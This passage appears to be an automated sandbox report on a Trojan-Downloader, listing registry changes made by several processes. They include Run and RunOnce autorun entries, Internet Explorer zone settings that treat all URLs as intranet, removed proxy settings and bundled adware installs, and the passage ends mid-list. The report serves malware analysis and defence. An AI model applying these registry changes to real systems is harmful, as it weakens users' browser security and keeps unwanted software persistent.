[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nss15\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 88 F5 76 5C E3 D1 CF 91 A9 B0 45 24 52 0D 7E"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nss15\DEBUG]
"Trace Level"

The process nss15.tmp:2668 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF AA 55 FD D8 31 E1 02 32 19 94 A8 7D 7D 76 42"

The process HY2F7WRL5V.exe:568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\SpaceSoundPro]
"ConfigPath" = "%Program Files%\SpaceSoundPro\config"
"Start Menu Folder" = "SpaceSoundPro 1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"InstallDate" = "20150803153554"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"UninstallString" = "%Program Files%\SpaceSoundPro\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"CustomID" = "241927763"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd9.tmp\NSISpcre.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"DisplayName" = "SpaceSoundPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\SpaceSoundPro]
"InstallPath" = "%Program Files%\SpaceSoundPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"NoModify" = "1"
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Audio]
"DisableProtectedAudioDG" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 5E 1A 74 81 74 03 7D A8 DF 7D B9 0B 36 8A D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpaceSoundPro" = "%Program Files%\SpaceSoundPro\SpaceSoundPro.exe"

The process AutoTime_51477.exe:4032 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 CF 71 5C E4 FA 4C DB 84 E4 66 AE 88 65 E9 0A"

The process win.exe:484 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Caster]
"wizzcaster.exe" = "BShyah"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"UninstallString" = "%Program Files%\Caster\Uninstaller.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayName" = "Caster"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"Publisher" = "Caster"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Wizzlabs\Wizzcaster]
"Identifier" = "csdi"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 39 76 7A DC 47 BE 61 3E 67 DD 11 DC B1 8A 69"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Caster" = "%Program Files%\Caster\wizzcaster.exe"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The process AutoTime_51477.tmp:4080 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 1A EE 6C 36 81 5E 1B 36 DB 3C CB 79 D0 ED 0E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "AutoTime_51477.tmp"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-KS1NL.tmp]
"AutoTime.exe" = "AutoShut Microsoft 基础类应用程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process nsl1E.tmp:2172 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsl1E\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 9A 94 81 7E 98 93 99 69 68 DD 84 46 A4 29 B3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsl1E\DEBUG]
"Trace Level"

The process idscservice.exe:1920 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 C2 1A 72 B2 6F 08 27 F7 86 67 10 68 21 D6 3C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX]
"win.exe" = "UbN"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\51MTCANOTX]
"testversion.exe" = "TGo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"IDSCPRODUCT" = "%Program Files%\SpaceSoundPro\idscservice.exe"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process idscservice.exe:1368 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 A8 66 99 46 E0 35 60 C2 3B 6D 3C 81 06 DF 4F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process nsjB.tmp:1568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 94 18 27 5A 35 A6 C4 9D 5F 6C 6A 52 C1 C7 A1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayName" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"Publisher" = "Body Text Feathering"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe"

The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "ED 5B 57 8E 4F 1B B4 80 8E 39 29 75 46 6F 72 F6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

